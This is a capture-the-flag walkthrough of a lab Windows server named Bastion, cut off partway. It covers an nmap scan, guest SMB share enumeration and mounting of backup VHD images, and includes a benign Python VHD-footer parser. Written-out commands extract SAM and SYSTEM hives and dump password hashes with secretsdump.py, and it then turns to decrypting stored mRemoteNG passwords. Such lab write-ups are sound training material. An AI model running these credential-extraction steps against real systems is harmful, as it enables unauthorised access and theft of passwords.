Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-18 23:39 CEST
Nmap scan report for 10.10.10.134
Host is up (0.027s latency).
Not shown: 65522 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  msrpc        Microsoft Windows RPC
49670/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -38m22s, deviation: 1h09m16s, median: 1m36s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-06-18T23:42:14+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-06-18 23:42:17
|_  start_date: 2019-06-18 23:22:10
From the output we can see that the server exposes SMB file sharing (ports 139 and 445), and that the scan was able to enumerate it with the guest account.
To list all the shares we can use the command smbclient -L 10.10.10.134, pressing Enter at the password prompt to send an empty password, which outputs:
Unable to initialize messaging context
smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
Enter WORKGROUP\s41m0n's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.134 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Now we can try to access them (or mount the share locally with mount -t cifs //10.10.10.134/Backups mountedBackup), finding that we can only access Backups and IPC$. Exploring the first one, we are led to the folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351, which contains a number of XML files plus two .vhd images.
VHD (Virtual Hard Disk) is a file format which represents a virtual hard disk drive (HDD). It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders. It is typically used as the hard disk of a virtual machine.
By using the command virt-list-filesystems mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd, provided by libguestfs, it is possible to list the partitions inside each virtual hard disk (in our case both images contain a single /dev/sda1).
Mount each VHD read-only in a temporary local directory: guestmount --add mountedBackup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --ro -m /dev/sda1 ~/Desktop/mntpt1 (the mount point is the last argument).
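As an added example (not part of the original write-up), a small Python parser for the VHD footer described above: it reads the 512-byte trailer that every VHD ends with, verifies the "conectix" cookie and checksum, and reports disk type, size, creation time and UUID. That is enough to inventory which backup images are sitting on a share before deciding whether they should be reachable at all. The build_footer helper constructs a sample footer for testing and is not data from a real image.

```python
import struct
import uuid
from datetime import datetime, timedelta, timezone

# 512-byte VHD footer, all fields big-endian, following the published VHD layout.
FOOTER = struct.Struct(">8s I I Q I 4s I 4s Q Q H B B I I 16s B 427s")
VHD_EPOCH = datetime(2000, 1, 1, tzinfo=timezone.utc)   # timestamps are seconds from here
DISK_TYPES = {0: "none", 2: "fixed", 3: "dynamic", 4: "differencing"}
FIXED_DISK_DATA_OFFSET = 0xFFFFFFFFFFFFFFFF              # fixed disks carry no dynamic header

def vhd_checksum(footer: bytes) -> int:
    """One's complement of the byte sum of the footer with the checksum field (bytes 64-67) zeroed."""
    total = sum(footer[:64]) + sum(footer[68:])
    return (~total) & 0xFFFFFFFF

def parse_footer(footer: bytes) -> dict:
    """Decode a footer; raise ValueError if the cookie or checksum shows this is not a sound VHD."""
    if len(footer) != FOOTER.size:
        raise ValueError("VHD footer must be exactly 512 bytes")
    (cookie, _features, version, data_off, ts, app, _app_ver, host_os, _orig_size,
     cur_size, cyl, heads, spt, disk_type, checksum, uid, saved, _res) = FOOTER.unpack(footer)
    if cookie != b"conectix":
        raise ValueError("missing 'conectix' cookie: not a VHD footer")
    if checksum != vhd_checksum(footer):
        raise ValueError("footer checksum mismatch (truncated or corrupted image?)")
    return {
        "format_version": f"{version >> 16}.{version & 0xFFFF}",
        "created": VHD_EPOCH + timedelta(seconds=ts),
        "creator_app": app.decode("ascii", "replace").strip(),
        "creator_os": host_os.decode("ascii", "replace"),
        "current_size": cur_size,
        "geometry": (cyl, heads, spt),
        "disk_type": DISK_TYPES.get(disk_type, f"unknown({disk_type})"),
        "dynamic_header_offset": None if data_off == FIXED_DISK_DATA_OFFSET else data_off,
        "uuid": str(uuid.UUID(bytes=uid)),
        "saved_state": bool(saved),
    }

def read_footer(path: str) -> dict:
    """Parse the footer of an image on disk: it is always the last 512 bytes of the file."""
    with open(path, "rb") as fh:
        fh.seek(-FOOTER.size, 2)
        return parse_footer(fh.read(FOOTER.size))

def build_footer(size: int, disk_type: int = 2, created_secs: int = 0, uid: bytes = b"\0" * 16) -> bytes:
    """Constructed sample footer (not from a real image) with a valid checksum, for testing."""
    data_off = FIXED_DISK_DATA_OFFSET if disk_type == 2 else FOOTER.size
    raw = FOOTER.pack(b"conectix", 2, 0x00010000, data_off, created_secs, b"win ", 0x000A0000,
                      b"Wi2k", size, size, 0, 0, 0, disk_type, 0, uid, 0, b"\0" * 427)
    return raw[:64] + struct.pack(">I", vhd_checksum(raw)) + raw[68:]
```

Running read_footer over every *.vhd under a mounted share gives a quick list of what each image is and when it was created, without mounting any of them.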
While the first image does not provide useful data, the second one is far more interesting: we can explore its Windows directory to check whether a SAM file is present, which suggests that, together with the SECURITY and SYSTEM hives, the stored credentials can hopefully be cracked.
Once those files have been retrieved, we can use the secretsdump.py script shipped with impacket to dump the credential hashes they contain:
$ python examples/secretsdump.py -sam ~/Desktop/SAM -security ~/Desktop/SECURITY -system ~/Desktop/SYSTEM LOCAL
For the root part we have to find a vulnerable service or program. By searching through the directories, we notice that the mRemoteNG application is installed. This is a tool for managing remote connections and their passwords, and a bug in an earlier version allows the stored passwords to be recovered. It keeps its data in an XML file, in our case C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml; opening it shows the stored passwords in encrypted form.
Recovering them using that weakness is quite easy; we can use, for example, mremoteng-decrypt: